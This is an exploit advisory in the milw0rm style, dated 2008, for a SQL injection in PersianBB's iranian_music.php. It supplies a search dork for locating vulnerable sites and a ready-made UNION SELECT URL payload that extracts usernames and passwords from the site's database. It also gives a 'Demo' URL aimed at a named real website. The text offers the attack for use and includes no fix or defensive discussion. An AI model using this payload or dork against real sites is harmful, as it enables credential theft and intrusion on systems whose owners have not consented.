|___________________________________________________ | | PersianBB (iranian_music.php id) Remote SQL Injection Vulnerability | |___________________________________________________ |---------------- Hussin X ------------------ | | Author: Hussin X | | Home : WwW.IQ-ty.CoM | | email: darkangel_g85[at]Yahoo[DoT]com | |___________________________________________________ | | script : http://www.persianbb.com/ | | DorK : Powered By : PersianBB.com |___________________________________________________ Exploit: ________ www.[target].com/Script/iranian_music.php?id=-1+union+select+1,concat_ws(0x3a,user,psw),3,4,5,6,7+from+prelude-- Demo: ________ http://persiandel.com/iranian_music.php?id=-1+union+select+1,concat_ws(0x3a,user,psw),3,4,5,6,7+from+prelude-- ________________( Greetz )_____________________ _____ ____ __ __ _ ____ |_ _| | _ \ \ \ / / / \ / ___| | | | |_) | \ V / / _ \ | | _ | | | _ < | | / ___ \ | |_| | |_| |_| \_\ |_| /_/ \_\ \____| _______________________________________________ # milw0rm.com [2008-10-28]